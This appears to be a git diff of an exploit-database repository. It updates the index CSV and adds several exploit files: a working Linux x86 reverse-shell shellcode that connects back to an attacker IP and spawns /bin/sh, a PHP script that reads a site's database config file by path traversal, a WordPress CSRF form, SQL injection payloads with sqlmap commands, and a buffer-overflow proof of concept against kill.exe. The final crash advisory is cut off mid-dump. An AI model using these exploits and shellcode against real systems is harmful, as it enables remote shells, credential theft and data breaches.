39435,platforms/multiple/webapps/39435.txt,"Apache Sling Framework (Adobe AEM) 2.3.6 - Information Disclosure Vulnerability",2016-02-10,Vulnerability-Lab,multiple,webapps,0
|
||||
39436,platforms/php/webapps/39436.txt,"Yeager CMS 1.2.1 - Multiple Vulnerabilities",2016-02-10,"SEC Consult",php,webapps,80
|
||||
|
@ -35736,7 +35736,7 @@ id,file,description,date,author,platform,type,port
|
|||
39512,platforms/windows/dos/39512.txt,"Viscomsoft Calendar Active-X 2.0 - Multiple Crash PoCs",2016-03-01,"Shantanu Khandelwal",windows,dos,0
|
||||
39513,platforms/php/webapps/39513.txt,"WordPress CP Polls Plugin 1.0.8 - Multiple Vulnerabilities",2016-03-01,"i0akiN SEC-LABORATORY",php,webapps,80
|
||||
39514,platforms/php/remote/39514.rb,"ATutor 2.2.1 SQL Injection / Remote Code Execution",2016-03-01,metasploit,php,remote,80
|
||||
39515,platforms/windows/remote/39515.rb,"NETGEAR ProSafe Network Management System 300 Arbitrary File Upload",2016-03-01,metasploit,windows,remote,8080
|
||||
39515,platforms/windows/remote/39515.rb,"NETGEAR ProSafe Network Management System 300 - Arbitrary File Upload",2016-03-01,metasploit,windows,remote,8080
|
||||
39516,platforms/windows/dos/39516.py,"Quick Tftp Server Pro 2.3 - Read Mode Denial of Service",2016-03-02,"Guillaume Kaddouch",windows,dos,69
|
||||
39517,platforms/windows/dos/39517.py,"Freeproxy Internet Suite 4.10 - Denial of Service",2016-03-02,"Guillaume Kaddouch",windows,dos,8080
|
||||
39518,platforms/windows/dos/39518.txt,"PictureTrails Photo Editor GE.exe 2.0.0 - .bmp Crash PoC",2016-03-02,redknight99,windows,dos,0
|
||||
|
@ -35789,7 +35789,7 @@ id,file,description,date,author,platform,type,port
|
|||
39570,platforms/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow",2016-03-16,"Core Security",freebsd_x86-64,dos,0
|
||||
39572,platforms/php/webapps/39572.txt,"PivotX 2.3.11 - Directory Traversal",2016-03-17,"Curesec Research Team",php,webapps,80
|
||||
39573,platforms/windows/webapps/39573.txt,"Wildfly - WEB-INF and META-INF Information Disclosure via Filter Restriction Bypass",2016-03-20,"Tal Solomon of Palantir Security",windows,webapps,0
|
||||
39574,platforms/windows/local/39574.cs,"Windows - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032)",2016-03-21,"Google Security Research",windows,local,0
|
||||
39574,platforms/windows/local/39574.cs,"Microsoft Windows 8.1/10 - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032)",2016-03-21,"Google Security Research",windows,local,0
|
||||
39575,platforms/php/webapps/39575.txt,"WordPress eBook Download Plugin 1.1 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80
|
||||
39576,platforms/php/webapps/39576.txt,"WordPress Import CSV Plugin 1.0 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80
|
||||
39577,platforms/php/webapps/39577.txt,"WordPress Abtest Plugin - Local File Inclusion",2016-03-21,CrashBandicot,php,webapps,80
|
||||
|
@ -35810,7 +35810,7 @@ id,file,description,date,author,platform,type,port
|
|||
39592,platforms/php/webapps/39592.txt,"WordPress Dharma booking Plugin 2.38.3 - File Inclusion Vulnerability",2016-03-22,AMAR^SHG,php,webapps,80
|
||||
39593,platforms/php/webapps/39593.txt,"WordPress Memphis Document Library Plugin 3.1.5 - Arbitrary File Download",2016-03-22,"Felipe Molina",php,webapps,80
|
||||
39594,platforms/windows/local/39594.pl,"CoolPlayer (Standalone) build 2.19 - .m3u Stack Overflow",2016-03-22,"Charley Celice",windows,local,0
|
||||
39595,platforms/multiple/local/39595.txt,"OS X / iOS Suid Binary Logic Error Kernel Code Execution",2016-03-23,"Google Security Research",multiple,local,0
|
||||
39595,platforms/multiple/local/39595.txt,"OS X / iOS - Suid Binary Logic Error Kernel Code Execution",2016-03-23,"Google Security Research",multiple,local,0
|
||||
39596,platforms/hardware/remote/39596.py,"Multiple CCTV-DVR Vendors - Remote Code Execution",2016-03-23,K1P0D,hardware,remote,0
|
||||
39597,platforms/multiple/webapps/39597.txt,"MiCollab 7.0 - SQL Injection Vulnerability",2016-03-23,"Goran Tuzovic",multiple,webapps,80
|
||||
39621,platforms/php/webapps/39621.txt,"WordPress Plugin IMDb Profile Widget 1.0.8 - Local File Inclusion",2016-03-27,CrashBandicot,php,webapps,80
|
||||
|
@ -35910,7 +35910,7 @@ id,file,description,date,author,platform,type,port
|
|||
39705,platforms/php/webapps/39705.txt,"WordPress Kento Post View Counter Plugin 2.8 - CSRF/XSS",2016-04-18,cor3sm4sh3r,php,webapps,80
|
||||
39706,platforms/hardware/dos/39706.txt,"TH692 Outdoor P2P HD Waterproof IP Camera - Hard Coded Credentials",2016-04-18,DLY,hardware,dos,0
|
||||
39707,platforms/php/webapps/39707.txt,"Webutler CMS 3.2 - Cross-Site Request Forgery",2016-04-18,"Keerati T.",php,webapps,80
|
||||
39708,platforms/multiple/remote/39708.rb,"Novell ServiceDesk Authenticated File Upload",2016-04-18,metasploit,multiple,remote,80
|
||||
39708,platforms/multiple/remote/39708.rb,"Novell ServiceDesk - Authenticated File Upload",2016-04-18,metasploit,multiple,remote,80
|
||||
39709,platforms/php/webapps/39709.txt,"pfSense Community Edition 2.2.6 - Multiple Vulnerabilities",2016-04-18,Security-Assessment.com,php,webapps,443
|
||||
39710,platforms/php/webapps/39710.txt,"modified eCommerce Shopsoftware 2.0.0.0 rev 9678 - Blind SQL Injection",2016-04-19,"Felix Maduakor",php,webapps,80
|
||||
39711,platforms/php/webapps/39711.php,"PHPBack 1.3.0 - SQL Injection",2016-04-20,hyp3rlinx,php,webapps,80
|
||||
|
@ -35940,7 +35940,7 @@ id,file,description,date,author,platform,type,port
|
|||
39738,platforms/multiple/webapps/39738.html,"EMC ViPR SRM - Cross-Site Request Forgery",2016-04-27,"Han Sahin",multiple,webapps,58080
|
||||
39739,platforms/hardware/webapps/39739.py,"Multiple Vendors (RomPager <= 4.34) - Misfortune Cookie Router Authentication Bypass",2016-04-27,"Milad Doorbash",hardware,webapps,0
|
||||
39740,platforms/windows/dos/39740.cpp,"Windows - CSRSS BaseSrvCheckVDM Session 0 Process Creation Privilege Escalation (MS16-048)",2016-04-27,"Google Security Research",windows,dos,0
|
||||
39741,platforms/osx/local/39741.txt,"Mach Race OS X Local Privilege Escalation Exploit",2016-04-27,fG!,osx,local,0
|
||||
39741,platforms/osx/local/39741.txt,"Mach Race OS X - Local Privilege Escalation Exploit",2016-04-27,fG!,osx,local,0
|
||||
39742,platforms/php/remote/39742.txt,"PHP 7.0.5 - ZipArchive::getFrom* Integer Overflow",2016-04-28,"Hans Jerry Illikainen",php,remote,0
|
||||
39743,platforms/windows/dos/39743.txt,"Windows Kernel - win32k.sys TTF Processing EBLC / EBSC Tables Pool Corruption (MS16-039)",2016-04-28,"Google Security Research",windows,dos,0
|
||||
39744,platforms/php/webapps/39744.html,"Observium 0.16.7533 - Cross Site Request Forgery",2016-04-29,"Dolev Farhi",php,webapps,80
|
||||
|
@ -36047,7 +36047,7 @@ id,file,description,date,author,platform,type,port
|
|||
39849,platforms/php/webapps/39849.txt,"XenAPI 1.4.1 for XenForo - Multiple SQL Injections",2016-05-23,"Julien Ahrens",php,webapps,443
|
||||
39850,platforms/asp/webapps/39850.txt,"AfterLogic WebMail Pro ASP.NET 6.2.6 - Administrator Account Disclosure via XXE Injection",2016-05-24,"Mehmet Ince",asp,webapps,80
|
||||
39851,platforms/lin_x86/shellcode/39851.c,"Linux x86 TCP Bind Shell Port 4444 (656 bytes)",2016-05-25,"Brandon Dennis",lin_x86,shellcode,0
|
||||
39852,platforms/java/remote/39852.rb,"Oracle ATS Arbitrary File Upload",2016-05-25,metasploit,java,remote,8088
|
||||
39852,platforms/java/remote/39852.rb,"Oracle Application Testing Suite (ATS) - Arbitrary File Upload",2016-05-25,metasploit,java,remote,8088
|
||||
39853,platforms/unix/remote/39853.rb,"Ubiquiti airOS Arbitrary File Upload",2016-05-25,metasploit,unix,remote,443
|
||||
39854,platforms/java/remote/39854.txt,"PowerFolder Server 10.4.321 - Remote Code Execution",2016-05-25,"Hans-Martin Muench",java,remote,0
|
||||
39855,platforms/php/webapps/39855.txt,"Real Estate Portal 4.1 - Multiple Vulnerabilities",2016-05-26,"Bikramaditya Guha",php,webapps,80
|
||||
|
@ -36068,7 +36068,7 @@ id,file,description,date,author,platform,type,port
|
|||
39871,platforms/cgi/webapps/39871.txt,"AirOS NanoStation M2 5.6-beta - Multiple Vulnerabilities",2016-05-31,"Pablo Rebolini",cgi,webapps,80
|
||||
39872,platforms/php/webapps/39872.txt,"ProcessMaker 3.0.1.7 - Multiple vulnerabilities",2016-05-31,"Mickael Dorigny",php,webapps,80
|
||||
39873,platforms/linux/dos/39873.py,"CCextractor 0.80 - Crash PoC",2016-05-31,"David Silveiro",linux,dos,0
|
||||
39874,platforms/windows/remote/39874.rb,"Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)",2016-05-31,"Ian Lovering",windows,remote,0
|
||||
39874,platforms/windows/remote/39874.rb,"HP Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)",2016-05-31,"Ian Lovering",windows,remote,0
|
||||
39875,platforms/linux/dos/39875.py,"TCPDump 4.5.1 - Crash PoC",2016-05-31,"David Silveiro",linux,dos,0
|
||||
39876,platforms/php/webapps/39876.txt,"AjaxExplorer 1.10.3.2 - Multiple Vulnerabilities",2016-06-01,hyp3rlinx,php,webapps,80
|
||||
39877,platforms/multiple/dos/39877.txt,"Wireshark - erf_meta_read_tag SIGSEGV",2016-06-01,"Google Security Research",multiple,dos,0
|
||||
|
@ -36246,3 +36246,12 @@ id,file,description,date,author,platform,type,port
|
|||
40067,platforms/linux/remote/40067.rb,"Nagios XI Chained Remote Code Execution",2016-07-06,metasploit,linux,remote,80
|
||||
40068,platforms/php/webapps/40068.txt,"OPAC KpwinSQL - Multiple Vulnerabilities",2016-07-07,"Yakir Wizman",php,webapps,80
|
||||
40069,platforms/windows/local/40069.cpp,"GE Proficy HMI/SCADA CIMPLICITY 8.2 - Local Privilege Escalation",2016-07-07,"Zhou Yu",windows,local,0
|
||||
40070,platforms/php/webapps/40070.txt,"WordPress Lazy Content Slider Plugin 3.4 - (Add Catetory) CSRF",2016-07-08,"Persian Hack Team",php,webapps,80
|
||||
40071,platforms/windows/local/40071.txt,"Hide.Me VPN Client 1.2.4 - Privilege Escalation",2016-07-08,sh4d0wman,windows,local,0
|
||||
40072,platforms/windows/local/40072.txt,"InstantHMI 6.1 - Privilege Escalation",2016-07-08,sh4d0wman,windows,local,0
|
||||
40073,platforms/windows/dos/40073.py,"Microsoft Process Kill Utility (kill.exe) 6.3.9600.17298 - Crash PoC",2016-07-08,hyp3rlinx,windows,dos,0
|
||||
40074,platforms/windows/dos/40074.txt,"Microsoft WinDbg logviewer.exe - Crash PoC",2016-07-08,hyp3rlinx,windows,dos,0
|
||||
40075,platforms/lin_x86/shellcode/40075.c,"Linux x86 TCP Reverse Shellcode - 75 bytes",2016-07-08,sajith,lin_x86,shellcode,0
|
||||
40076,platforms/php/webapps/40076.php,"php Real Estate Script 3 - Arbitrary File Disclosure",2016-07-08,"Meisam Monsef",php,webapps,80
|
||||
40077,platforms/xml/webapps/40077.txt,"CyberPower Systems PowerPanel 3.1.2 - XXE Out-Of-Band Data Retrieval",2016-07-08,LiquidWorm,xml,webapps,3052
|
||||
40078,platforms/php/webapps/40078.txt,"Streamo Online Radio And TV Streaming CMS - SQL Injection",2016-07-08,N4TuraL,php,webapps,80
|
||||
|
|
Can't render this file because it is too large.
|
177
platforms/lin_x86/shellcode/40075.c
Executable file
177
platforms/lin_x86/shellcode/40075.c
Executable file
|
@ -0,0 +1,177 @@
|
|||
/*
|
||||
# Linux x86 TCP Reverse Shellcode (75 bytes)
|
||||
# Author: sajith
|
||||
# Tested on: i686 GNU/Linux
|
||||
# Shellcode Length: 75
|
||||
# SLAE - 750
|
||||
|
||||
------------c prog ---poc by sajith shetty----------
|
||||
|
||||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/in.h>
|
||||
|
||||
int main(void)
|
||||
|
||||
{
|
||||
|
||||
int sock_file_des;
|
||||
struct sockaddr_in sock_ad;
|
||||
//[1] create socket connection
|
||||
//Man page: socket(int domain, int type, int protocol);
|
||||
sock_file_des = socket(AF_INET, SOCK_STREAM, 0);
|
||||
|
||||
|
||||
//[2]connect back to attacker machine (ip= 192.168.227.129)
|
||||
//Man page: int connect(int sockfd, const struct sockaddr *addr,socklen_t addrlen);
|
||||
|
||||
sock_ad.sin_family = AF_INET;
|
||||
sock_ad.sin_port = htons(4444);
|
||||
sock_ad.sin_addr.s_addr = inet_addr("192.168.227.129");
|
||||
connect(sock_file_des,(struct sockaddr *) &sock_ad,sizeof(sock_ad));
|
||||
//[3]Redirect file descriptors (STDIN, STDOUT and STDERR) to the socket using DUP2
|
||||
//Man page: int dup2(int oldfd, int newfd);
|
||||
|
||||
dup2(sock_file_des, 0); // stdin
|
||||
dup2(sock_file_des, 1); // stdout
|
||||
dup2(sock_file_des, 2); // stderr
|
||||
|
||||
//[4]Execute shell (here we use /bin/sh) using execve call
|
||||
|
||||
//[*]Man page for execve call
|
||||
//int execve(const char *filename, char *const argv[],char *const envp[]);
|
||||
|
||||
execve("/bin/sh", 0, 0);
|
||||
}
|
||||
----------------------end of c program--------------
|
||||
|
||||
global _start
|
||||
|
||||
section .text
|
||||
|
||||
_start:
|
||||
;[1] create socket connection
|
||||
;Man page: socket(int domain, int type, int protocol);
|
||||
;sock_file_des = socket(2,1,0)
|
||||
|
||||
xor edx, edx
|
||||
push 0x66 ; socket call(0x66)
|
||||
pop eax
|
||||
push edx ; protocol = 0
|
||||
inc edx
|
||||
push edx ; sock_stream = 1
|
||||
mov ebx, edx ; EBX =1
|
||||
inc edx
|
||||
push edx ; AF_INET =2
|
||||
mov ecx, esp ; save the pointer to args in ecx register
|
||||
int 0x80 ; call socketcall()
|
||||
|
||||
; int dup2(int oldfd, int newfd);
|
||||
mov ebx, eax ; store sock_file_des in ebx register
|
||||
mov ecx, edx ; counter = 2
|
||||
loop:
|
||||
mov al, 0x3f
|
||||
int 0x80
|
||||
dec ecx
|
||||
jns loop
|
||||
; sock_ad.sin_family = AF_INET;
|
||||
;sock_ad.sin_port = htons(4444);
|
||||
;sock_ad.sin_addr.s_addr = inet_addr("192.168.227.129");
|
||||
;connect(sock_file_des,(struct sockaddr *) &sock_ad,sizeof(sock_ad));
|
||||
xchg ebx, edx ; before xchg edx=2 and ebx=sock_file_des and after xchg ebx=2, edx=sock_file_des
|
||||
push 0x81e3a8c0 ; sock_ad.sin_addr.s_addr = inet_addr("192.168.227.129");
|
||||
push word 0x5C11 ; sock_ad.sin_port = htons(4444);
|
||||
push word bx ; sock_ad.sin_family = AF_INET =2;
|
||||
mov ecx, esp ; pointer to struct
|
||||
|
||||
mov al, 0x66 ; socket call (0x66)
|
||||
inc ebx ; connect (3)
|
||||
push 0x10 ; sizeof(struct sockaddr_in)
|
||||
push ecx ; &serv_addr
|
||||
push edx ; sock_file_des
|
||||
mov ecx, esp ; save the pointer to args in ecx register
|
||||
int 0x80
|
||||
|
||||
mov al, 11 ; execve system call
|
||||
cdq ; overwriting edx with either 0 (if eax is positive)
|
||||
push edx ; push null
|
||||
push 0x68732f6e ; hs/b
|
||||
push 0x69622f2f ; ib//
|
||||
mov ebx,esp ; save pointer
|
||||
push edx ; push null
|
||||
push ebx ; push pointer
|
||||
mov ecx,esp ; save pointer
|
||||
int 0x80
|
||||
|
||||
-------------obj dump------------
|
||||
rev_shell1: file format elf32-i386
|
||||
|
||||
|
||||
Disassembly of section .text:
|
||||
|
||||
08048060 <_start>:
|
||||
8048060: 31 d2 xor edx,edx
|
||||
8048062: 6a 66 push 0x66
|
||||
8048064: 58 pop eax
|
||||
8048065: 52 push edx
|
||||
8048066: 42 inc edx
|
||||
8048067: 52 push edx
|
||||
8048068: 89 d3 mov ebx,edx
|
||||
804806a: 42 inc edx
|
||||
804806b: 52 push edx
|
||||
804806c: 89 e1 mov ecx,esp
|
||||
804806e: cd 80 int 0x80
|
||||
8048070: 89 c3 mov ebx,eax
|
||||
8048072: 89 d1 mov ecx,edx
|
||||
|
||||
08048074 <loop>:
|
||||
8048074: b0 3f mov al,0x3f
|
||||
8048076: cd 80 int 0x80
|
||||
8048078: 49 dec ecx
|
||||
8048079: 79 f9 jns 8048074 <loop>
|
||||
804807b: 87 da xchg edx,ebx
|
||||
804807d: 68 c0 a8 e3 81 push 0x81e3a8c0
|
||||
8048082: 66 68 11 5c pushw 0x5c11
|
||||
8048086: 66 53 push bx
|
||||
8048088: 89 e1 mov ecx,esp
|
||||
804808a: b0 66 mov al,0x66
|
||||
804808c: 43 inc ebx
|
||||
804808d: 6a 10 push 0x10
|
||||
804808f: 51 push ecx
|
||||
8048090: 52 push edx
|
||||
8048091: 89 e1 mov ecx,esp
|
||||
8048093: cd 80 int 0x80
|
||||
8048095: b0 0b mov al,0xb
|
||||
8048097: 99 cdq
|
||||
8048098: 52 push edx
|
||||
8048099: 68 6e 2f 73 68 push 0x68732f6e
|
||||
804809e: 68 2f 2f 62 69 push 0x69622f2f
|
||||
80480a3: 89 e3 mov ebx,esp
|
||||
80480a5: 52 push edx
|
||||
80480a6: 53 push ebx
|
||||
80480a7: 89 e1 mov ecx,esp
|
||||
80480a9: cd 80 int 0x80
|
||||
|
||||
-----------------------------------------------
|
||||
gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
|
||||
*/
|
||||
|
||||
#include<stdio.h>
|
||||
#include<string.h>
|
||||
|
||||
unsigned char code[] = \
|
||||
|
||||
"\x31\xd2\x6a\x66\x58\x52\x42\x52\x89\xd3\x42\x52\x89\xe1\xcd\x80\x89\xc3\x89\xd1\xb0\x3f\xcd\x80\x49\x79\xf9\x87\xda\x68"
|
||||
"\xc0\xa8\xe3\x81" //IP address 192.168.227.129
|
||||
"\x66\x68"
|
||||
"\x11\x5c" // port 4444
|
||||
"\x66\x53\x89\xe1\xb0\x66\x43\x6a\x10\x51\x52\x89\xe1\xcd\x80\xb0\x0b\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80";
|
||||
|
||||
|
||||
main()
|
||||
{
|
||||
printf("Shellcode Length: %d\n", strlen(code));
|
||||
int (*ret)() = (int(*)())code;
|
||||
ret();
|
||||
}
|
30
platforms/php/webapps/40070.txt
Executable file
30
platforms/php/webapps/40070.txt
Executable file
|
@ -0,0 +1,30 @@
|
|||
######################
|
||||
# Exploit Title : WordPress Lazy content Slider Plugin - CSRF Vulnerability
|
||||
# Exploit Author : Persian Hack Team
|
||||
# Vendor Homepage : https://wordpress.org/support/view/plugin-reviews/lazy-content-slider
|
||||
# Category: [ Webapps ]
|
||||
# Tested on: [ Win ]
|
||||
# Version: 3.4
|
||||
# Date: 2016/07/08
|
||||
######################
|
||||
#
|
||||
# PoC:
|
||||
# The vulnerable page is
|
||||
# /wp-content/plugins/lazy-content-slider/lzcs_admin.php
|
||||
# The Code for CSRF.html is
|
||||
|
||||
<html>
|
||||
<form action="http://localhost/wp/wp-admin/admin.php?page=lazy-content-slider%2Flzcs.php" method="POST">
|
||||
<input name="lzcs" type="text" value="lzcs">
|
||||
<input name="lzcs_color" type="text" value="dark">
|
||||
<input type="text" name="lzcs_count" value="5">
|
||||
<input type="submit" value="go!!">
|
||||
</form>
|
||||
</html>
|
||||
|
||||
#
|
||||
######################
|
||||
# Discovered by : Mojtaba MobhaM
|
||||
# Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R And All Persian Hack Team Members
|
||||
# Homepage : http://persian-team.ir
|
||||
######################
|
35
platforms/php/webapps/40076.php
Executable file
35
platforms/php/webapps/40076.php
Executable file
|
@ -0,0 +1,35 @@
|
|||
# Exploit Title: php Real Estate Script Arbitrary File Disclosure
|
||||
# Date: 2016-07-08
|
||||
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
|
||||
# Vendor Homepage: http://www.realestatescript.eu/
|
||||
# Version: v.3
|
||||
# Download Link : http://www.realestatescript.eu/downloads/realestatescript-v3.zip
|
||||
|
||||
Exploit :
|
||||
<?php
|
||||
//read db config file
|
||||
$post_data = 'tpl=../../private/config/db.php';//change read file path
|
||||
$host = "www.server.local";//change victim address
|
||||
$socket = fsockopen($host, 80, $errno, $errstr, 15);
|
||||
if(!$socket){
|
||||
echo ' error: ' . $errno . ' ' . $errstr;
|
||||
die;
|
||||
}else{
|
||||
//change [demo/en] path server
|
||||
$path = "/demo/en/";
|
||||
$http = "POST {$path}admin/ajax_cms/get_template_content/ HTTP/1.1\r\n";
|
||||
$http .= "Host: $host\r\n";
|
||||
$http .= "Content-Type: application/x-www-form-urlencoded\r\n";
|
||||
$http .= "Content-length: " . strlen($post_data) . "\r\n";
|
||||
$http .= "Connection: close\r\n\r\n";
|
||||
$http .= $post_data . "\r\n\r\n";
|
||||
fwrite($socket, $http);
|
||||
$contents = "";
|
||||
while (!feof($socket)) {
|
||||
$contents .= fgets($socket, 4096);
|
||||
}
|
||||
fclose($socket);
|
||||
$e = explode('Content-Type: text/html',$contents);
|
||||
print $e[1];
|
||||
}
|
||||
?>
|
55
platforms/php/webapps/40078.txt
Executable file
55
platforms/php/webapps/40078.txt
Executable file
|
@ -0,0 +1,55 @@
|
|||
######################
|
||||
# Application Name : Streamo - Online Radio And Tv Streaming CMS
|
||||
|
||||
# Google Dork : inurl:rjdetails.php?id=
|
||||
|
||||
# Exploit Author : Cyber Warrior | Bug Researchers Group | N4TuraL
|
||||
|
||||
# Author Contact : https://twitter.com/byn4tural
|
||||
|
||||
# Vendor Homepage : http://rexbd.net/
|
||||
|
||||
# Vulnerable Type : SQL Injection
|
||||
|
||||
# Date : 2016-07-08
|
||||
|
||||
# Tested on : Windows 10 / Mozilla Firefox
|
||||
# Linux / Mozilla Firefox
|
||||
# Linux / sqlmap 1.0.6.28#dev
|
||||
|
||||
###################### SQL Injection Vulnerability ######################
|
||||
|
||||
# Location :
|
||||
http://localhost/[path]/menu.php
|
||||
http://localhost/[path]/programs.php
|
||||
http://localhost/[path]/rjdetails.php
|
||||
|
||||
######################
|
||||
|
||||
# Vulnerable code :
|
||||
|
||||
$gid = $_GET["id"];
|
||||
|
||||
|
||||
######################
|
||||
|
||||
# PoC Exploit:
|
||||
|
||||
http://localhost/[path]/programs.php?id=999999.9%27%20union%20all%20select%20concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29%20as%20char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536%20and%20%27x%27%3D%27x
|
||||
|
||||
# Exploit Code via sqlmap:
|
||||
|
||||
sqlmap -u http://localhost/[path]/programs.php?id=10 --dbs
|
||||
|
||||
Parameter: id (GET)
|
||||
Type: AND/OR time-based blind
|
||||
Title: MySQL >= 5.0.12 AND time-based blind
|
||||
Payload: id=10' AND SLEEP(5) AND 'yTqi'='yTqi
|
||||
|
||||
Type: UNION query
|
||||
Title: Generic UNION query (NULL) - 2 columns
|
||||
Payload: id=-4222' UNION ALL SELECT NULL,CONCAT(0x7170787871,0x586d5a4275566c486f6f78475a59506c524f5762506944746c7358645a544e527874737478756364,0x7178627071)-- uFiY
|
||||
---
|
||||
|
||||
######################
|
||||
|
99
platforms/windows/dos/40073.py
Executable file
99
platforms/windows/dos/40073.py
Executable file
|
@ -0,0 +1,99 @@
|
|||
'''
|
||||
[+] Credits: HYP3RLINX
|
||||
[+] Website: hyp3rlinx.altervista.org
|
||||
[+] Source: http://hyp3rlinx.altervista.org/advisories/MS-KILL-UTILITY-BUFFER-OVERFLOW.txt
|
||||
[+] ISR: ApparitionSec
|
||||
|
||||
|
||||
Vendor:
|
||||
=================
|
||||
www.microsoft.com
|
||||
|
||||
|
||||
Product:
|
||||
=========================================
|
||||
Microsoft Process Kill Utility "kill.exe"
|
||||
File version: 6.3.9600.17298
|
||||
|
||||
The Kill tool (kill.exe), a tool used to terminate a process, part of the
|
||||
WinDbg program.
|
||||
|
||||
|
||||
Vulnerability Type:
|
||||
===================
|
||||
Buffer Overflow
|
||||
|
||||
|
||||
SEH Buffer Overflow @ about 512 bytes
|
||||
|
||||
|
||||
Vulnerability Details:
|
||||
=====================
|
||||
|
||||
Register dump
|
||||
|
||||
|
||||
'SEH chain of main thread
|
||||
Address SE handler
|
||||
001AF688 kernel32.756F489B
|
||||
001AFBD8 52525252
|
||||
42424242 *** CORRUPT ENTRY ***
|
||||
|
||||
|
||||
001BF81C 41414141 AAAA
|
||||
001BF820 41414141 AAAA
|
||||
001BF824 41414141 AAAA
|
||||
001BF828 41414141 AAAA
|
||||
001BF82C 41414141 AAAA
|
||||
001BF830 41414141 AAAA
|
||||
001BF834 909006EB ë Pointer to next SEH record
|
||||
001BF838 52525252 RRRR SE handler <================
|
||||
001BF83C 90909090
|
||||
001BF840 90909090
|
||||
|
||||
|
||||
Exploit code(s):
|
||||
================
|
||||
|
||||
Python POC.
|
||||
'''
|
||||
|
||||
junk="A"*508+"RRRR"
|
||||
|
||||
pgm='c:\\Program Files (x86)\\Windows Kits\\8.1\\Debuggers\\x86\\kill.exe '
|
||||
subprocess.Popen([pgm, junk], shell=False)
|
||||
|
||||
|
||||
'''
|
||||
Disclosure Timeline:
|
||||
==================================
|
||||
Vendor Notification: June 24, 2016
|
||||
Vendor reply: Will not security service
|
||||
July 8, 2016 : Public Disclosure
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Local
|
||||
|
||||
|
||||
Severity Level:
|
||||
================
|
||||
Low
|
||||
|
||||
|
||||
[+] Disclaimer
|
||||
The information contained within this advisory is supplied "as-is" with no
|
||||
warranties or guarantees of fitness of use or otherwise.
|
||||
Permission is hereby granted for the redistribution of this advisory,
|
||||
provided that it is not altered except by reformatting it, and
|
||||
that due credit is given. Permission is explicitly given for insertion in
|
||||
vulnerability databases and similar, provided that due credit
|
||||
is given to the author. The author is not responsible for any misuse of the
|
||||
information contained herein and accepts no responsibility
|
||||
for any damage caused by the use or misuse of this information. The author
|
||||
prohibits any malicious use of security related information
|
||||
or exploits by the author or elsewhere.
|
||||
|
||||
HYP3RLINX
|
||||
'''
|
230
platforms/windows/dos/40074.txt
Executable file
230
platforms/windows/dos/40074.txt
Executable file
|
@ -0,0 +1,230 @@
|
|||
[+] Credits: HYP3RLINX
|
||||
|
||||
[+] Website: hyp3rlinx.altervista.org
|
||||
|
||||
[+] Source:
|
||||
http://hyp3rlinx.altervista.org/advisories/MS-WINDBG-LOGVIEWER-BUFFER-OVERFLOW.txt
|
||||
|
||||
[+] ISR: ApparitionSec
|
||||
|
||||
|
||||
Vendor:
|
||||
=================
|
||||
www.microsoft.com
|
||||
|
||||
|
||||
Product:
|
||||
====================
|
||||
WinDbg logviewer.exe
|
||||
|
||||
LogViewer (logviewer.exe), a tool that displays the logs created, part of
|
||||
WinDbg application.
|
||||
|
||||
|
||||
Vulnerability Type:
|
||||
===================
|
||||
Buffer Overflow DOS
|
||||
|
||||
|
||||
Vulnerability Details:
|
||||
=====================
|
||||
|
||||
Buffer overflow in WinDbg "logviewer.exe" when opening corrupted .lgv
|
||||
files. App crash then Overwrite of MMX registers etc...
|
||||
this utility belongs to Windows Kits/8.1/Debuggers/x86
|
||||
|
||||
Read Access Violation / Memory Corruption
|
||||
Win32 API Log Viewer
|
||||
6.3.9600.17298
|
||||
Windbg x86
|
||||
logviewer.exe
|
||||
Log Viewer 3.01 for x86
|
||||
|
||||
|
||||
(5fb8.32fc): Access violation - code c0000005 (first chance)
|
||||
First chance exceptions are reported before any exception handling.
|
||||
This exception may be expected and handled.
|
||||
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
|
||||
C:\Windows\syswow64\msvcrt.dll -
|
||||
eax=013dad30 ebx=005d0000 ecx=00000041 edx=00000000 esi=005d2000
|
||||
edi=013dcd30
|
||||
eip=754fa048 esp=0009f840 ebp=0009f848 iopl=0 nv up ei pl nz na pe
|
||||
nc
|
||||
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
|
||||
efl=00210206
|
||||
msvcrt!memmove+0x1ee:
|
||||
754fa048 660f6f06 movdqa xmm0,xmmword ptr [esi]
|
||||
ds:002b:005d2000=????????????????????????????????
|
||||
|
||||
gs 2b
|
||||
fs 53
|
||||
es 2b
|
||||
ds 2b
|
||||
edi 136cd30
|
||||
esi 7d2000
|
||||
ebx 7d0000
|
||||
edx 0
|
||||
ecx 41
|
||||
eax 136ad30
|
||||
ebp df750
|
||||
eip 754fa048
|
||||
cs 23
|
||||
efl 210206
|
||||
esp df748
|
||||
ss 2b
|
||||
dr0 0
|
||||
dr1 0
|
||||
dr2 0
|
||||
dr3 0
|
||||
dr6 0
|
||||
dr7 0
|
||||
di cd30
|
||||
si 2000
|
||||
bx 0
|
||||
dx 0
|
||||
cx 41
|
||||
ax ad30
|
||||
bp f750
|
||||
ip a048
|
||||
fl 206
|
||||
sp f748
|
||||
bl 0
|
||||
dl 0
|
||||
cl 41
|
||||
al 30
|
||||
bh 0
|
||||
dh 0
|
||||
ch 0
|
||||
ah ad
|
||||
fpcw 27f
|
||||
fpsw 4020
|
||||
fptw ffff
|
||||
fopcode 0
|
||||
fpip 76454c1e
|
||||
fpipsel 23
|
||||
fpdp 6aec2c
|
||||
fpdpsel 2b
|
||||
st0 -1.00000000000000e+000
|
||||
st1 -1.00000000000000e+000
|
||||
